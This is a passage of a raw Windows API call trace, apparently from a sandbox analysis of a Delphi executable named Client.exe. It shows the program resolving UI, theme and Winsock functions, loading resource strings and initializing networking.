GetCurrentThreadId () returned 0xd44 [0287.165] GetCurrentThreadId () returned 0xd44 [0287.165] GetCurrentThreadId () returned 0xd44 [0287.165] GetCurrentThreadId () returned 0xd44 [0287.165] GetCurrentThreadId () returned 0xd44 [0287.165] GetCurrentThreadId () returned 0xd44 [0287.165] GetCurrentThreadId () returned 0xd44 [0287.165] GetCurrentThreadId () returned 0xd44 [0287.165] GetCurrentThreadId () returned 0xd44 [0287.165] CharLowerBuffW (in: lpsz="TMenuItem", cchLength=0x9 | out: lpsz="tmenuitem") returned 0x9 [0287.165] CharLowerBuffW (in: lpsz="TComponent", cchLength=0xa | out: lpsz="tcomponent") returned 0xa [0287.165] CharLowerBuffW (in: lpsz="TPersistent", cchLength=0xb | out: lpsz="tpersistent") returned 0xb [0287.165] CharLowerBuffW (in: lpsz="TPersistent", cchLength=0xb | out: lpsz="tpersistent") returned 0xb [0287.165] GetCurrentThreadId () returned 0xd44 [0287.165] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x745f0000 [0287.165] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeFlatSB", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0287.165] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeFlatSB", cchWideChar=16, lpMultiByteStr=0x9d849c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeFlatSB", lpUsedDefaultChar=0x0) returned 16 [0287.166] GetProcAddress (hModule=0x745f0000, lpProcName="InitializeFlatSB") returned 0x746cf803 [0287.166] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="UninitializeFlatSB", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0287.166] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="UninitializeFlatSB", cchWideChar=18, lpMultiByteStr=0x9d849c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UninitializeFlatSB", lpUsedDefaultChar=0x0) returned 18 [0287.166] GetProcAddress (hModule=0x745f0000, lpProcName="UninitializeFlatSB") returned 0x745fd1ea [0287.166] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_GetScrollProp", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0287.166] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_GetScrollProp", cchWideChar=20, lpMultiByteStr=0x9d849c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_GetScrollProp", lpUsedDefaultChar=0x0) returned 20 [0287.166] GetProcAddress (hModule=0x745f0000, lpProcName="FlatSB_GetScrollProp") returned 0x746cf81f [0287.166] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_SetScrollProp", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0287.166] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_SetScrollProp", cchWideChar=20, lpMultiByteStr=0x9d849c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_SetScrollProp", lpUsedDefaultChar=0x0) returned 20 [0287.166] GetProcAddress (hModule=0x745f0000, lpProcName="FlatSB_SetScrollProp") returned 0x746707d0 [0287.166] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_EnableScrollBar", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0287.166] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_EnableScrollBar", cchWideChar=22, lpMultiByteStr=0x9d849c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_EnableScrollBar", lpUsedDefaultChar=0x0) returned 22 [0287.166] GetProcAddress (hModule=0x745f0000, lpProcName="FlatSB_EnableScrollBar") returned 0x746cf84b [0287.166] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_ShowScrollBar", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0287.166] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_ShowScrollBar", cchWideChar=20, lpMultiByteStr=0x9d849c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_ShowScrollBar", lpUsedDefaultChar=0x0) returned 20 [0287.167] GetProcAddress (hModule=0x745f0000, lpProcName="FlatSB_ShowScrollBar") returned 0x746cf83a [0287.167] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_GetScrollRange", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0287.167] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_GetScrollRange", cchWideChar=21, lpMultiByteStr=0x9d849c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_GetScrollRange", lpUsedDefaultChar=0x0) returned 21 [0287.167] GetProcAddress (hModule=0x745f0000, lpProcName="FlatSB_GetScrollRange") returned 0x746cf829 [0287.167] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_GetScrollInfo", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0287.167] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_GetScrollInfo", cchWideChar=20, lpMultiByteStr=0x9d849c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_GetScrollInfo", lpUsedDefaultChar=0x0) returned 20 [0287.167] GetProcAddress (hModule=0x745f0000, lpProcName="FlatSB_GetScrollInfo") returned 0x746708b6 [0287.167] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_GetScrollPos", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0287.167] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_GetScrollPos", cchWideChar=19, lpMultiByteStr=0x9d849c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_GetScrollPos", lpUsedDefaultChar=0x0) returned 19 [0287.167] GetProcAddress (hModule=0x745f0000, lpProcName="FlatSB_GetScrollPos") returned 0x746cf80e [0287.167] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_SetScrollPos", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0287.167] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_SetScrollPos", cchWideChar=19, lpMultiByteStr=0x9d849c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_SetScrollPos", lpUsedDefaultChar=0x0) returned 19 [0287.167] GetProcAddress (hModule=0x745f0000, lpProcName="FlatSB_SetScrollPos") returned 0x74670894 [0287.167] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_SetScrollInfo", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0287.167] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_SetScrollInfo", cchWideChar=20, lpMultiByteStr=0x9d849c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_SetScrollInfo", lpUsedDefaultChar=0x0) returned 20 [0287.167] GetProcAddress (hModule=0x745f0000, lpProcName="FlatSB_SetScrollInfo") returned 0x746708c7 [0287.167] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_SetScrollRange", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0287.167] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_SetScrollRange", cchWideChar=21, lpMultiByteStr=0x9d849c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_SetScrollRange", lpUsedDefaultChar=0x0) returned 21 [0287.168] GetProcAddress (hModule=0x745f0000, lpProcName="FlatSB_SetScrollRange") returned 0x746708a5 [0287.168] GetModuleHandleW (lpModuleName="user32.dll") returned 0x773b0000 [0287.168] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetLayeredWindowAttributes", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0287.168] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetLayeredWindowAttributes", cchWideChar=26, lpMultiByteStr=0x9dfb4c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetLayeredWindowAttributes", lpUsedDefaultChar=0x0) returned 26 [0287.168] GetProcAddress (hModule=0x773b0000, lpProcName="SetLayeredWindowAttributes") returned 0x773eec88 [0287.168] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc09d [0287.168] RegisterClipboardFormatW (lpszFormat="TaskbarButtonCreated") returned 0xc09e [0287.168] LoadStringW (in: hInstance=0x400000, uID=0xfe72, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="shutdown") returned 0x8 [0287.168] LoadStringW (in: hInstance=0x400000, uID=0xfe71, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="interrogate") returned 0xb [0287.168] LoadStringW (in: hInstance=0x400000, uID=0xfe70, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="continue") returned 0x8 [0287.168] LoadStringW (in: hInstance=0x400000, uID=0xfe8f, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="pause") returned 0x5 [0287.168] LoadStringW (in: hInstance=0x400000, uID=0xfe8e, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="stop") returned 0x4 [0287.169] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fcec, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0287.169] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x769b0000 [0287.169] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetFileSizeEx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0287.169] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetFileSizeEx", cchWideChar=13, lpMultiByteStr=0x9c320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetFileSizeEx", lpUsedDefaultChar=0x0) returned 13 [0287.169] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileSizeEx") returned 0x769c599a [0287.169] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0xcc0000 [0287.169] LoadStringW (in: hInstance=0x400000, uID=0xfe32, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="%s") returned 0x2 [0287.170] LoadStringW (in: hInstance=0x400000, uID=0xfe31, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="Disconnected.") returned 0xd [0287.170] LoadStringW (in: hInstance=0x400000, uID=0xfe30, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="Disconnecting.") returned 0xe [0287.170] LoadStringW (in: hInstance=0x400000, uID=0xfe4f, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="Connected.") returned 0xa [0287.170] LoadStringW (in: hInstance=0x400000, uID=0xfe4e, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="Connecting to %s.") returned 0x11 [0287.170] LoadStringW (in: hInstance=0x400000, uID=0xfe4d, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="Resolving hostname %s.") returned 0x16 [0287.170] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x97799c | out: lpBuffer="C:\\Windows\\TEMP\\") returned 0x10 [0287.171] SetErrorMode (uMode=0x8000) returned 0x1 [0287.172] LoadLibraryW (lpLibFileName="security.dll") returned 0x75300000 [0287.345] SetErrorMode (uMode=0x1) returned 0x8000 [0287.345] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitSecurityInterfaceW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0287.345] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitSecurityInterfaceW", cchWideChar=22, lpMultiByteStr=0x9d8604, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitSecurityInterfaceW", lpUsedDefaultChar=0x0) returned 22 [0287.346] GetProcAddress (hModule=0x75300000, lpProcName="InitSecurityInterfaceW") returned 0x75551314 [0287.348] InitSecurityInterfaceW () returned 0x75560198 [0287.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTLM", cchCount1=4, lpString2="NTLM", cchCount2=4) returned 2 [0287.348] LoadStringW (in: hInstance=0x400000, uID=0xffa3, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="Jan") returned 0x3 [0287.349] LoadStringW (in: hInstance=0x400000, uID=0xffaf, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="January") returned 0x7 [0287.349] LoadStringW (in: hInstance=0x400000, uID=0xffa4, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="Feb") returned 0x3 [0287.349] LoadStringW (in: hInstance=0x400000, uID=0xff90, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="February") returned 0x8 [0287.349] LoadStringW (in: hInstance=0x400000, uID=0xffa5, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="Mar") returned 0x3 [0287.349] LoadStringW (in: hInstance=0x400000, uID=0xff91, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="March") returned 0x5 [0287.349] LoadStringW (in: hInstance=0x400000, uID=0xffa6, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="Apr") returned 0x3 [0287.349] LoadStringW (in: hInstance=0x400000, uID=0xff92, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="April") returned 0x5 [0287.349] LoadStringW (in: hInstance=0x400000, uID=0xffa7, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="May") returned 0x3 [0287.349] LoadStringW (in: hInstance=0x400000, uID=0xff93, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="May") returned 0x3 [0287.349] LoadStringW (in: hInstance=0x400000, uID=0xffa8, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="Jun") returned 0x3 [0287.349] LoadStringW (in: hInstance=0x400000, uID=0xff94, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="June") returned 0x4 [0287.349] LoadStringW (in: hInstance=0x400000, uID=0xffa9, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="Jul") returned 0x3 [0287.350] LoadStringW (in: hInstance=0x400000, uID=0xff95, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="July") returned 0x4 [0287.350] LoadStringW (in: hInstance=0x400000, uID=0xffaa, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="Aug") returned 0x3 [0287.350] LoadStringW (in: hInstance=0x400000, uID=0xff96, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="August") returned 0x6 [0287.350] LoadStringW (in: hInstance=0x400000, uID=0xffab, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="Sep") returned 0x3 [0287.350] LoadStringW (in: hInstance=0x400000, uID=0xff97, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="September") returned 0x9 [0287.350] LoadStringW (in: hInstance=0x400000, uID=0xffac, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="Oct") returned 0x3 [0287.350] LoadStringW (in: hInstance=0x400000, uID=0xff98, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="October") returned 0x7 [0287.350] LoadStringW (in: hInstance=0x400000, uID=0xffad, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="Nov") returned 0x3 [0287.350] LoadStringW (in: hInstance=0x400000, uID=0xff99, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="November") returned 0x8 [0287.350] LoadStringW (in: hInstance=0x400000, uID=0xffae, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="Dec") returned 0x3 [0287.350] LoadStringW (in: hInstance=0x400000, uID=0xff9a, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="December") returned 0x8 [0287.350] LoadStringW (in: hInstance=0x400000, uID=0xff9b, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="Sun") returned 0x3 [0287.350] LoadStringW (in: hInstance=0x400000, uID=0xff82, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="Sunday") returned 0x6 [0287.350] LoadStringW (in: hInstance=0x400000, uID=0xff9c, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="Mon") returned 0x3 [0287.351] LoadStringW (in: hInstance=0x400000, uID=0xff83, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="Monday") returned 0x6 [0287.351] LoadStringW (in: hInstance=0x400000, uID=0xff9d, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="Tue") returned 0x3 [0287.351] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="Tuesday") returned 0x7 [0287.351] LoadStringW (in: hInstance=0x400000, uID=0xff9e, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="Wed") returned 0x3 [0287.351] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="Wednesday") returned 0x9 [0287.351] LoadStringW (in: hInstance=0x400000, uID=0xff9f, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="Thu") returned 0x3 [0287.351] LoadStringW (in: hInstance=0x400000, uID=0xff86, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="Thursday") returned 0x8 [0287.351] LoadStringW (in: hInstance=0x400000, uID=0xff80, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="Fri") returned 0x3 [0287.351] LoadStringW (in: hInstance=0x400000, uID=0xff87, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="Friday") returned 0x6 [0287.351] LoadStringW (in: hInstance=0x400000, uID=0xff81, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="Sat") returned 0x3 [0287.351] LoadStringW (in: hInstance=0x400000, uID=0xff88, lpBuffer=0x18be28, cchBufferMax=4096 | out: lpBuffer="Saturday") returned 0x8 [0287.352] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x75610000 [0287.352] GetProcAddress (hModule=0x75610000, lpProcName="WSAIoctl") returned 0x75612fe7 [0287.352] GetProcAddress (hModule=0x75610000, lpProcName="__WSAFDIsSet") returned 0x75616a8a [0287.352] GetProcAddress (hModule=0x75610000, lpProcName="closesocket") returned 0x75613918 [0287.352] GetProcAddress (hModule=0x75610000, lpProcName="ioctlsocket") returned 0x75613084 [0287.353] GetProcAddress (hModule=0x75610000, lpProcName="WSAGetLastError") returned 0x756137ad [0287.353] GetProcAddress (hModule=0x75610000, lpProcName="WSAStartup") returned 0x75613ab2 [0287.353] GetProcAddress (hModule=0x75610000, lpProcName="WSACleanup") returned 0x75613c5f [0287.353] GetProcAddress (hModule=0x75610000, lpProcName="accept") returned 0x756168b6 [0287.353] GetProcAddress (hModule=0x75610000, lpProcName="bind") returned 0x75614582 [0287.353] GetProcAddress (hModule=0x75610000, lpProcName="connect") returned 0x75616bdd [0287.353] GetProcAddress (hModule=0x75610000, lpProcName="getpeername") returned 0x75617147 [0287.353] GetProcAddress (hModule=0x75610000, lpProcName="getsockname") returned 0x756130af [0287.353] GetProcAddress (hModule=0x75610000, lpProcName="getsockopt") returned 0x7561737d [0287.354] GetProcAddress (hModule=0x75610000, lpProcName="htonl") returned 0x75612d57 [0287.354] GetProcAddress (hModule=0x75610000, lpProcName="htons") returned 0x75612d8b [0287.354] GetProcAddress (hModule=0x75610000, lpProcName="inet_addr") returned 0x7561311b [0287.354] GetProcAddress (hModule=0x75610000, lpProcName="inet_ntoa") returned 0x7561b131 [0287.354] GetProcAddress (hModule=0x75610000, lpProcName="listen") returned 0x7561b001 [0287.354] GetProcAddress (hModule=0x75610000, lpProcName="ntohl") returned 0x75612d57 [0287.354] GetProcAddress (hModule=0x75610000, lpProcName="ntohs") returned 0x75612d8b [0287.354] GetProcAddress (hModule=0x75610000, lpProcName="recv") returned 0x75616b0e [0287.355] GetProcAddress (hModule=0x75610000, lpProcName="recvfrom") returned 0x7561b6dc [0287.355] GetProcAddress (hModule=0x75610000, lpProcName="select") returned 0x75616989 [0287.355] GetProcAddress (hModule=0x75610000, lpProcName="send") returned 0x75616f01 [0287.355] GetProcAddress (hModule=0x75610000, lpProcName="sendto") returned 0x756134b5 [0287.355] GetProcAddress (hModule=0x75610000, lpProcName="setsockopt") returned 0x756141b6 [0287.355] GetProcAddress (hModule=0x75610000, lpProcName="shutdown") returned 0x7561449d [0287.355] GetProcAddress (hModule=0x75610000, lpProcName="socket") returned 0x75613eb8 [0287.355] GetProcAddress (hModule=0x75610000, lpProcName="gethostbyaddr") returned 0x75626c01 [0287.355] GetProcAddress (hModule=0x75610000, lpProcName="gethostbyname") returned 0x75627673 [0287.356] GetProcAddress (hModule=0x75610000, lpProcName="getprotobyname") returned 0x756268b3 [0287.356] GetProcAddress (hModule=0x75610000, lpProcName="getprotobynumber") returned 0x756267c4 [0287.356] GetProcAddress (hModule=0x75610000, lpProcName="getservbyname") returned 0x75626ef3 [0287.356] GetProcAddress (hModule=0x75610000, lpProcName="getservbyport") returned 0x75626d62 [0287.356] GetProcAddress (hModule=0x75610000, lpProcName="gethostname") returned 0x7561a05b [0287.356] GetProcAddress (hModule=0x75610000, lpProcName="getaddrinfo") returned 0x75614296 [0287.356] GetProcAddress (hModule=0x75610000, lpProcName="freeaddrinfo") returned 0x75614b1b [0287.356] GetProcAddress (hModule=0x75610000, lpProcName="getnameinfo") returned 0x756167b7 [0287.356] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x83f240 | out: lpWSAData=0x83f240) returned 0 [0287.365] GetVersionExW (in: lpVersionInformation=0x83f44c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x83f44c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0287.365] GetCurrentThreadId () returned 0xd44 [0287.365] GetCurrentThreadId () returned 0xd44 [0287.365] CharLowerBuffW (in: lpsz="TPersistent", cchLength=0xb | out: lpsz="tpersistent") returned 0xb [0287.365] CharLowerBuffW (in: lpsz="TComponent", cchLength=0xa | out: lpsz="tcomponent") returned 0xa [0287.365] GetCurrentThreadId () returned 0xd44 [0287.365] GetCurrentThreadId () returned 0xd44 [0287.365] GetCurrentThreadId () returned 0xd44 [0287.365] GetCurrentThreadId () returned 0xd44 [0287.366] GetCurrentThreadId () returned 0xd44 [0287.366] GetCurrentThreadId () returned 0xd44 [0287.366] GetCurrentThreadId () returned 0xd44 [0287.366] GetCurrentThreadId () returned 0xd44 [0287.366] GetCurrentThreadId () returned 0xd44 [0287.366] GetCurrentThreadId () returned 0xd44 [0287.368] LoadCursorW (hInstance=0x400000, lpCursorName="CAT_DRAG_COPY") returned 0x100c7 [0287.369] LoadLibraryW (lpLibFileName="uxtheme.dll") returned 0x74430000 [0287.369] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OpenThemeData", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0287.369] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OpenThemeData", cchWideChar=13, lpMultiByteStr=0x9c390c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OpenThemeData", lpUsedDefaultChar=0x0) returned 13 [0287.369] GetProcAddress (hModule=0x74430000, lpProcName="OpenThemeData") returned 0x74445f29 [0287.369] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CloseThemeData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0287.369] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CloseThemeData", cchWideChar=14, lpMultiByteStr=0x9c390c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseThemeData", lpUsedDefaultChar=0x0) returned 14 [0287.369] GetProcAddress (hModule=0x74430000, lpProcName="CloseThemeData") returned 0x74441fa1 [0287.369] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeBackground", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0287.369] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeBackground", cchWideChar=19, lpMultiByteStr=0x9d88ac, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DrawThemeBackground", lpUsedDefaultChar=0x0) returned 19 [0287.369] GetProcAddress (hModule=0x74430000, lpProcName="DrawThemeBackground") returned 0x7444d464 [0287.369] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeText", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0287.369] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeText", cchWideChar=13, lpMultiByteStr=0x9c390c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DrawThemeText", lpUsedDefaultChar=0x0) returned 13 [0287.370] GetProcAddress (hModule=0x74430000, lpProcName="DrawThemeText") returned 0x7444db21 [0287.370] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeBackgroundContentRect", cchWideChar=29, lpMultiByteStr=0x0, 